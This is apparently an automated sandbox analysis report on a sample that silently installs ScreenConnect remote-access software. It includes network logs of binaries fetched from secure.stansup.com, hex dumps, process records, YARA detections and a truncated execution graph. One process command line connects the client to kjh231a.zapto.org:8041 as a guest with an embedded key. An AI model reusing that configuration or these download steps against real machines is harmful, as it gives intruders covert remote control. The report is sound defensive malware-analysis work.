2024-10-25 17:27:30 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49728 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:31 UTC | 117 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:31 UTC | 213 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:30 GMT
Connection: close
2024-10-25 17:27:31 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49729 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:32 UTC | 131 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:32 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:32 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49730 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:34 UTC | 119 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:34 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:34 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49731 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:36 UTC | 120 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:36 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:36 GMT
Connection: close
                                                                                                                                                                                                                                                        Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                        Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                        Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                        Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                        Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                        Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49732 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:42 UTC | 102 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:42 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:42 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49733 | 79.110.49.185 | 443 | 1556 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:43 UTC | 93 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:44 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548352
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:43 GMT
Connection: close
                                                                                                                                                                                                                                                        Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                        Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                        Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                        Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        12192.168.2.94973479.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp, Bytes transferred, Direction, Data
2024-10-25 17:27:47 UTC, 102, OUT:
GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:48 UTC, 216, IN:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 600864
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:47 GMT
Connection: close



Target ID: 0
Start time: 13:27:12
Start date: 25/10/2024
Path: C:\Users\user\Desktop\khwHsyfsJ1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\khwHsyfsJ1.exe"
Imagebase: 0xb60000
File size: 83'360 bytes
MD5 hash: 24686214DADBE686482FB77F11010DF4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:27:12
Start date: 25/10/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase: 0x1d43ce00000
File size: 24'856 bytes
MD5 hash: B4088F44B80D363902E11F897A7BAC09
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

Target ID:3
Start time:13:27:13
Start date:25/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:13:27:13
Start date:25/10/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
Imagebase:0x830000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:13:27:13
Start date:25/10/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
Imagebase:0x830000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:13:27:13
Start date:25/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:8
Start time:13:27:15
Start date:25/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:0x7ff77afe0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:13:27:51
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
Imagebase:0xa30000
File size:600'864 bytes
MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:true

Target ID:11
Start time:13:27:51
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
Imagebase:0xfe0000
File size:95'520 bytes
MD5 hash:200A917996F0FC74879076354454473A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:13:27:51
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
Imagebase:0xfe0000
File size:95'520 bytes
MD5 hash:200A917996F0FC74879076354454473A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:13:27:53
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
Imagebase:0xe80000
File size:600'864 bytes
MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:2.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:3.8%
Total number of Nodes:1465
Total number of Limit Nodes:4
LocalAlloc CryptMsgGetParam 5085->5087 5090 b611b5 LoadLibraryA GetProcAddress 5086->5090 5091 b611b1 5086->5091 5092 b61114 CertCreateCertificateContext 5087->5092 5093 b6113d LocalFree 5087->5093 5088->5082 5089 b6120a CertDeleteCertificateFromStore 5088->5089 5089->5088 5090->5079 5091->5079 5091->5090 5094 b61126 CertAddCertificateContextToStore 5092->5094 5095 b61133 CertFreeCertificateContext 5092->5095 5093->5087 5096 b6114d 5093->5096 5094->5095 5095->5093 5096->5084 5098 b637d1 _abort 5097->5098 5098->5044 5099 b64424 _abort 33 API calls 5098->5099 5102 b63e9a 5099->5102 5100 b63f24 _abort 33 API calls 5101 b63ec4 5100->5101 5102->5100 5104 b6140c 5103->5104 5104->5038 5104->5055 5686 b6355e 5105->5686 5107 b6378f 5107->5056 5109 b617a8 ___scrt_uninitialize_crt 5108->5109 5110 b61421 5109->5110 5111 b61f7d ___scrt_uninitialize_crt 7 API calls 5109->5111 5110->5043 5111->5110 5113 b61935 _abort 5112->5113 5114 b619e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 b61a24 _abort 5114->5115 5115->5038 5117 b6355e _abort 23 API calls 5116->5117 5118 b637f2 5117->5118 5118->5039 5120 b6355e _abort 23 API calls 5119->5120 5121 b61488 5120->5121 5123 b61640 5122->5123 5124 b61f5e 5123->5124 5138 b624b1 5124->5138 5128 b61f6f 5129 b61f7a 5128->5129 5152 b624ed 5128->5152 5129->5065 5131 b61f67 5131->5065 5133 b61f86 5132->5133 5134 b61f90 5132->5134 5135 b62496 ___vcrt_uninitialize_ptd 6 API calls 5133->5135 5134->5066 5136 b61f8b 5135->5136 5137 b624ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5134 5139 b624ba 5138->5139 5141 b624e3 5139->5141 5143 b61f63 5139->5143 5156 b6271d 5139->5156 5142 b624ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5142 5142->5143 5143->5131 5144 b62463 5143->5144 5173 b6262e 5144->5173 5149 b62493 5149->5128 5151 b62478 5151->5128 5153 b62517 5152->5153 5154 b624f8 5152->5154 5153->5131 5155 b62502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 
b62543 5156->5161 5159 b62755 InitializeCriticalSectionAndSpinCount 5160 b62740 5159->5160 5160->5139 5162 b62560 5161->5162 5165 b62564 5161->5165 5162->5159 5162->5160 5163 b625cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 b625bd 5165->5166 5168 b625e3 LoadLibraryExW 5165->5168 5166->5163 5167 b625c5 FreeLibrary 5166->5167 5167->5163 5169 b6262a 5168->5169 5170 b625fa GetLastError 5168->5170 5169->5165 5170->5169 5171 b62605 ___vcrt_FlsFree 5170->5171 5171->5169 5172 b6261b LoadLibraryExW 5171->5172 5172->5165 5174 b62543 ___vcrt_FlsFree 5 API calls 5173->5174 5175 b62648 5174->5175 5176 b62661 TlsAlloc 5175->5176 5177 b6246d 5175->5177 5177->5151 5178 b626df 5177->5178 5179 b62543 ___vcrt_FlsFree 5 API calls 5178->5179 5180 b626f9 5179->5180 5181 b62714 TlsSetValue 5180->5181 5182 b62486 5180->5182 5181->5182 5182->5149 5183 b62496 5182->5183 5184 b624a0 5183->5184 5186 b624a6 5183->5186 5187 b62669 5184->5187 5186->5151 5188 